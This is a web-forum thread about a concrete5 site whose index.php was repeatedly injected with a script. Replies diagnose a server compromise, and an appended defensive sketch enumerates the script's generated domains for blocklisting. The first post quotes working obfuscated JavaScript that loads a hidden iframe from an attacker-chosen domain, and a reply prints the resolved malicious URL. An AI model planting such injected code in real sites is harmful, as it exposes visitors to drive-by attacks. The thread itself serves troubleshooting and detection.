Strange code in my index.php

Hello,

I have a problem with this theme; for some reason concrete put some code in my index file.

That is no big deal, but the code is causing trouble because the page won't load anymore, so I remove the code and the page pops up.

This is the code that is getting in the index file.
<?php echo '<script>
var keyss = "ap12m3n4j5i6u7dh8b9v0gytfcdr5ewqdas";var enc = [3, 5, 7, 15, 4, 32, 7, 9, 19];var ah = (new Date).getDate();
var strUA = "";strUA = navigator.userAgent.toLowerCase();if(strUA.indexOf("msie") != -1)if(navigator.javaEnabled()){var url = "http://";for (i = 0; i < enc.length; i++) {url += keyss.substr(ah * enc[i] % 31, 1);}
url += ".in/ts/in.php?q=2";fff = "fram";
if (document.getElementsByTagName("body")[0]) {asdfasdfasdf43();} else {document.write("<i" + fff + "e src='" + url + "' width='100' height='100' style='position:absolute;left:-190;top:-982;'></i" + fff + "e>");}}
function asdfasdfasdf43() {var f = document.createElement("i" + fff + "e");f.setAttribute("src", url);f.style.position = "absolute";f.style.left = "-129";f.style.top = "-172";f.setAttribute("width", "100");f.setAttribute("height", "100");document.getElementsByTagName("body")[0].appendChild(f);}
</script>'; echo '';


mesuva replied:
That looks like some kind of script injection - the server your site is on has been compromised in some way.

So you'd want to delete that code and/or restore from a known good copy.
You'd probably also want to raise it as an issue with your host.

I don't think it's a concrete5 specific hack/security issue.
(although I have had to clean something like this for someone else's concrete5 site in the past, and it definitely looked like it was targeting concrete5... hmmm)
Redzor replied:
Thanks for the replies.

I have informed my hosting, but they said that there is nothing at his side. So it must be for some reason in an add-on or theme file or something like that.

I will search further. I have also noticed that it always adds the code once a week.

I will search further.
Mnkras replied:
c5 did not add that. That looks like it could be malicious though.

Mike
jordanlev replied:
Mnkras is correct -- it is absolutely positively not a Concrete5-specific thing (although it's possible that someone is exploiting a C5 vulnerability to inject that code into the pages). But the code itself doesn't do anything specific to Concrete5 -- it looks like it's inserting an iFrame into the page, but only for Internet Explorer and only if Java is enabled. I ran the code that generates the url and got this:
http://mbw0dywuh.in/ts/in.php?q=2

(don't actually go to that url -- it probably does something bad).

So... somehow someone has gotten access to files on your server (it may not be a personal or targeted attack on you -- it could be some bot that just tries lots of different things on lots of different servers). Or maybe there's a javascript vulnerability that allowed this to happen through your website somehow. Or perhaps your CPanel or FTP name/password were gotten (or guessed)? Definitely change your account logins/passwords. And also I would try contacting your web host support again. Not sure what "nothing on his side" means -- maybe they think they don't have any security holes (which isn't possible to ever know for sure, so I'd be dubious if they claim this), or maybe they just mean that they didn't change the files. Regardless, it doesn't matter -- the fact is that one way or another someone accessed files on your server and they should be able to help you clean up the mess (not because it's their fault, but because their job is supposed to be to support their customers -- and also they should want to know if this happened on their servers as it likely is affecting other customers of theirs as well). If they are not going to be helpful to you at all, I'd suggest moving to a different web host that will support you better. You might have to pay an additional dollar or two per month, but if your website is important to you or your business, it will be worth it.

Best of luck.

-Jordan
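
Added example, not part of the original thread: the injected script picks its host from the visitor's day of the month, so the URL jordanlev computed is only one of up to 31. This sketch reuses the `keyss` and `enc` constants from the first post to list every host the script can produce and to flag them in proxy or DNS logs; the function names and the sample log lines are constructed for illustration.

```javascript
// Constants copied verbatim from the injected script in the first post.
const KEYSS = "ap12m3n4j5i6u7dh8b9v0gytfcdr5ewqdas";
const ENC = [3, 5, 7, 15, 4, 32, 7, 9, 19];

// Host label the script builds for a given day of the month (1-31).
// The script uses (new Date).getDate(), i.e. the visitor's local date.
function labelForDay(day) {
  return ENC.map((e) => KEYSS.charAt((day * e) % 31)).join("");
}

// Every host the script can generate, mapped to the day that yields it.
function allHosts() {
  const hosts = new Map();
  for (let day = 1; day <= 31; day++) {
    hosts.set(labelForDay(day) + ".in", day);
  }
  return hosts;
}

// Return the log lines that mention any generated host.
function findHits(logLines) {
  const hosts = allHosts();
  const hits = [];
  for (const line of logLines) {
    const lower = line.toLowerCase();
    for (const [host, day] of hosts) {
      if (lower.includes(host)) hits.push({ host, day, line });
    }
  }
  return hits;
}

// Constructed sample proxy log lines (not real traffic).
const SAMPLE_LOG = [
  "2011-03-22T10:01:07Z 10.0.0.15 GET http://example.org/index.php 200",
  "2011-03-22T10:01:08Z 10.0.0.15 GET http://mbw0dywuh.in/ts/in.php?q=2 200",
  "2011-03-23T09:14:55Z 10.0.0.22 GET http://example.org/about 200",
];

// Print the full day-to-host table, then the matching log lines.
for (const [host, day] of allHosts()) {
  console.log(String(day).padStart(2, " "), host);
}
console.log(findHits(SAMPLE_LOG).map((h) => h.line));
```

The resulting host list can be loaded into a DNS or proxy blocklist, and any hit in historical logs identifies an Internet Explorer client that loaded the infected page.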